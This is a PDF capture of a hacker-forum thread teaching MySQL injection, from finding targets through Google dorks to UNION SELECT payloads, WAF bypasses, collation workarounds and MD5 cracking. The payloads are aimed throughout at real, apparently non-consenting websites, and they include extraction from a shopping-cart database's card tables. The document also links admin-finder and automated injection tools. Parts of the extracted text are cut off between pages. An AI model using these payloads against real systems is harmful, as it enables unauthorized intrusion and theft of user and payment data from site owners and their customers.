TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1.pdf

  • Published on
    15-Nov-2015

  • View
    12

  • Download
    4

DESCRIPTION

TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1.pdf

Transcript

  • 10/14/2014 TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1

    http://www.hackforums.net/showthread.php?tid=1814660 1/12

    Thread Options

    10-13-2011, 12:41 AM (This post was last modified: 12-16-2012 12:04 AM by bckslsh..) Post: #1

    TUTORIAL - Basic MySQL injection [UPDATED

    with BLIND SQLi]

    bckslsh. Closed Account

    Prestige: 71Posts: 2,780Joined: May 2011 Reputation: 134

    Before you say there are already enough tutorials on here, I know. But I plan onmaking this one of the best on hackforums.

    If you're looking for string injections, or WAF bypassing please look at the bottomof this thread. :)

    Contents - Control + F the code (S0.x)

    S0.1 - Full tutorial.S0.2 - String injection. Do you not get an error even after order by 1000?S0.3 - WAF bypassing. Do you get 403'd when trying to use commands?

    S0.4 - Do you get "Illegal mix of collations for operation 'UNION'" when trying toinject?

    S0.5 - Getting data from other databases.S0.6 - Blind SQL Injection

    S0.1 - The tutorial

    First of all we wil want to either find vulnerabilities on a site, or find one via dorks.

    To find vulnerabilities on a site, we can use google. Type into google,

    Code:

    site:site.com inurl:.php?id=

    If you get no results, you can try

    Code:

    site:site.com inurl:.php?

    To find sites via dorks, it is very simple. Just type into google -

    inurl:dork

  • 10/14/2014 TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1

    http://www.hackforums.net/showthread.php?tid=1814660 2/12

    For example

    Code:

    inurl:article.php?id=

    Here is a list of dorks you could use.http://pastebin.com/k2FFy1YH

    And of course, you could come up with your own.

    After we have found a vulnerable site, we will test to see if it is vunerable to SQLinjection. Simply add an ' at the end of the parameter, example -

    Code:

    .php?id=1'

    And if we get any sort of error, it MAY be vulnerable. You can check by using theorder by technique.

    Add order by 1-- onto the end of your URL, and if displays normally then we canmove on. Else if you still get an error, chances are it is not vulnerable.

    Now that we know the site is vulnerable, we will continue injecting. I have found asite for the purpose of this tutorial.

    Code:

    http://www.iblist.com/book.php?id=235

    We add ' onto the end of the url.

    Code:

    http://www.iblist.com/book.php?id=235'

    And we get an error. Now add

    Code:

    order by 1--

    so

    Code:

    http://www.iblist.com/book.php?id=235 order by 1--

  • 10/14/2014 TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1

    http://www.hackforums.net/showthread.php?tid=1814660 3/12

    and we get no error. It's vulnerable.

    Now we want to find out the number of columns. To do this there are multipleways, but the most common are ORDER BY, and GROUP BY. They can be used in

    the same way.

    We will add order by 1, and keep increasing the integer untill we get an error. Saywe go up by one at a time, and we get an error when we hit 5. This means the site

    would have 4 columns.

    Code:

    http://www.iblist.com/book.php?id=235 order by 1--

    No

    Code:

    http://www.iblist.com/book.php?id=235 order by 2--

    Code:

    http://www.iblist.com/book.php?id=235 order by 3--

  • 10/14/2014 TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1

    http://www.hackforums.net/showthread.php?tid=1814660 4/12

    http://www.iblist.com/book.php?id=235 order by 13--

  • 10/14/2014 TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1

    http://www.hackforums.net/showthread.php?tid=1814660 5/12

    or

    Code:

    @@version

    Code:

    http://www.iblist.com/book.php?id=null UNION SELECT1,version(),3,4,5,6,7,8,9,10,11,12,13,14--

    Ahh, it's running version 5. That's good. If it was

  • 10/14/2014 TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1

    http://www.hackforums.net/showthread.php?tid=1814660 6/12

    After going through, I know there are 56 tables.

    Code:

    http://www.iblist.com/book.php?id=null UNION SELECT1,concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14 from

    information_schema.tables where table_schema=database() LIMIT 56,1--

    Because if i try 57,1 i get an error.

    Now search through the tables untill you find something intresting, such as "admin"or "users".

    Table 56 happens to be users. Note it down, incase you forget. So we will work withthis, if we don't get anything usefull we will try and find another table which may

    contain sensitive data.

    Now we want to find out the columns within that table. To do this we will raplaceconcat(table_name) with column_name. And replace information_schema.tables

    with information_schema.columns, and add the table_name="tablename" instead oftable_schema.

    So

    Code:

    http://www.iblist.com/book.php?id=null UNION SELECT1,concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14 frominformation_schema.columns where table_name="users"--

    But we get an error. To bypass this we will have to use CHAR(charcode)

    So users would be

    Code:

    CHAR(117, 115, 101, 114, 115)

    I'd suggest using HackBar to convert it. It is a nifty little addon for firefox.

    But it still displays no data. Maybe the column is empty? To find out use "count"

    And derp, it returned 0.. fail on my behalf. I was writing this tutorial in real time.

    So we will gather data from another table, just so I can show how you do it.

    I found another table, it doesn't contain that much useful data, but for thepurposes of the tutorial I will show you how to extract data from a table :D

  • 10/14/2014 TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1

    http://www.hackforums.net/showthread.php?tid=1814660 7/12

    The table I found was "puser"

    so

    Code:

    http://www.iblist.com/book.php?id=null UNION SELECT1,group_concat(column_name),3,4,5,6,7,8,9,10,11,12,13,14 from

    information_schema.columns where table_name=CHAR(112, 117, 115, 101,114)--

    And we get.

    Code:

    id,username

    To extract this data we will have to do group_concat(columns) from table

    So

    Code:

    http://www.iblist.com/book.php?id=null UNION SELECT1,group_concat(id,username),3,4,5,6,7,8,9,10,11,12,13,14 from puser--

    But it looks terribad, not layed out right and hard to tell them apart.

    So we will add some hexdecimal values for a line break, and a semi colon.

    Code:

    http://www.iblist.com/book.php?id=null UNION SELECT1,group_concat(id,0x3a,username,0x0a),3,4,5,6,7,8,9,10,11,12,13,14 from

    puser--

    0x3a = :0x0a = line break

    Easier to tell them apart now :) And again, if you can't see them all you can useconcat and limit.

    If you want to find the username for a specific ID, viceversa, you can use

    Code:

    http://www.iblist.com/book.php?id=null UNION SELECT1,group_concat(id,0x3a,username,0x0a),3,4,5,6,7,8,9,10,11,12,13,14 from

    puser where id=1--

  • 10/14/2014 TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1

    http://www.hackforums.net/showthread.php?tid=1814660 8/12

    Now that you have this data, you can do whatever you want with it. Unfortunatleythis didn't conain any passwords, but now you know hot to extract the column

    data if there is a passwords column. If it comes out as a long string of letters, it ismost likely an MD5 hash. To crack it you can either download MDBruter, or any

    other MD5 bruteforcer, or see if it has already been cracked by going to

    http://hashchecker.de/find.html

    S0.2 - String Injection

    If you're trying to find out the number of columns for a site, yet when you do orderby 999 you don't get an error, you should try string injection next. To do this

    simply add

    --++--++--

    instead of

    --

    onto the end of your url, and add an apostrophe " ' " ontot the end of theparameter, so it would look like

    Code:

    www.site.com/example.php?id=1 order by 999--

  • 10/14/2014 TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1

    http://www.hackforums.net/showthread.php?tid=1814660 9/12

    This block out nasty SQL commands that could be a potential threat to the site.

    If you're injecting, and you run across this, it is very simple to bypass. There are afew methods, examples -

    Alternating between Capitalised/Non-Capitalised.

    Code:

    http://site.com/example.php?id=null UnIOn SelECT 1,2,3,4,5--

    Using comment tags

    Code:

    /*!*/

    Code:

    http://site.com/example.php?id=null /*!UNION*/ /*!SELECT*/ 1,2,3,4,5--

    Some of the more notable commands/phrases it blocks out in a standard injectionare -

    Code:

    UNIONSELECT

    GROUP_CONCATCONCAT

    INFORMATION_SCHEMATABLE_SCHEMA

    Note, to you can't bypass group_concat, so you have to use /*!Concat*/ to selectone at a time. And at the end of the injection, before the --'s add LIMIT 0,1 and

    keep increasing it by 1 to see each value.

    S0.4 - Illegal mix of collations for operation 'UNION'

    This is a common error that alot of people get. Normally when people are trying touse "group_concat", or "version()" etc. Alot of the time when people get this errorthey think the site isn't injectable, and just give up and go find a new site. Well it'seasy to get past this. All you have to do it unhex a hex'd command. For example

  • 10/14/2014 TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1

    http://www.hackforums.net/showthread.php?tid=1814660 10/12

    Code:

    group_concat(unhex(hex(table_name)))

    Example on a site -

    Code:

    http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT1,2,group_concat(unhex(hex(table_name))) from

    /*!information_schema*/.tables where table_schema=database()--

    You can also use "convert".

    Code:

    group_concat(CONVERT(table_name USING latin1))

    Code:

    http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT1,2,group_concat(CONVERT(table_name USING latin1)) from

    /*!information_schema*/.tables where table_schema=database()--

    And the following:

    uncompress(compress(version()))cast(version() as char)

    aes_decrypt(aes_encrypt(version(),1),1)binary(version())

    CONVERT(version() USING x)x = charset, for example

    asciibinarylatin1utf8

    S0.5 - Getting data from other DBs'

    Have you ever gone through all the trouble of injecting a site just to find that thereare no user tables? Well chances are there might be, although there might not be.But we will find out how to go by this, by looking in other databases on the site.

    First of all we will need to find the current databases. To do this you will use this -

    Code:

    group_concat(schema_name) from information_schema.schemata

  • 10/14/2014 TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1

    http://www.hackforums.net/showthread.php?tid=1814660 11/12

    Example on a site -

    Code:

    http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT1,2,group_concat(CONVERT(schema_name USING latin1)) from

    /*!information_schema*/.schemata--

    Now that we have the database names, you will have to go through them and findthe one you want. You might not get them all, since group_concat has a 1024

    character limit, but you could always use concat and limit, and go through them 1by 1.

    For simplicity I will use the first DB in there. "CCS_Shopping_Carts". We will do theusual "group_concat(table_name)". But where we normally put "where

    table_schema=database()", we will add the database we want. You will need to hexthe DB, and add "0x" onto the front of it. You can hex it using any string to

    hexdecimal converter - http://www.string-functions.com/string-hex.aspx - or usingthe built in one on hackbar.

    Example -

    Code:

    http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT1,2,group_concat(CONVERT(table_name USING latin1)) from

    /*!information_schema*/.tables wheretable_schema=0x4343535f53686f7070696e675f4361727473--

    Now to get the columns, it's just the same really.

    Code:

    http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT1,2,group_concat(CONVERT(column_name USING latin1)) from

    /*!information_schema*/.columns wheretable_name=0x61636365707465645f6361726473--

    And finally to get the data, you want to specify the database name and the tablename like, databasename.table. Note if you're using unhex(hex()) or convert, it

    won't work. Just use group_concat, and it will :).

    Code:

    http://www.prophecywatchministries.org/pages.php?id=null UNION SELECT1,2,group_concat(accepted_cards_id,0x3a,cart_id,0x3a,credit_card_id,0x0a)

    from CCS_Shopping_Carts.accepted_cards--

    And there we go :).

  • 10/14/2014 TUTORIAL - Basic MySQL injection [UPDATED with BLIND SQLi] - Page 1

    http://www.hackforums.net/showthread.php?tid=1814660 12/12

    S0.6 - Blind SQL injection

    http://www.hackforums.net/showthread.php?tid=2041266 < tutorial. I reached thecharacter limit on this thread.

    Resources.

    http://hashchecker.de/find.html - Sends the query to a number of MD5 checkingsites, saves alot of time.

    http://timwarriner.com/software/md5brute.html - MD5 Bruteforcer.http://itsecteam.com/en/projects/project1_page2.htm - If you're a skid and can't

    be bothered following a simple tutorial, this is for you.http://th3-0utl4ws.com/tools/admin-finder/ - Online admin finder.

    http://pastebin.com/wsfBfegb - Admin Finder, scripted in perl. By GlaDiaT0R.Supports PHP/CFM/HTML/ASP

    http://www.string-functions.com/string-hex.aspx - String to hexdecimal converter.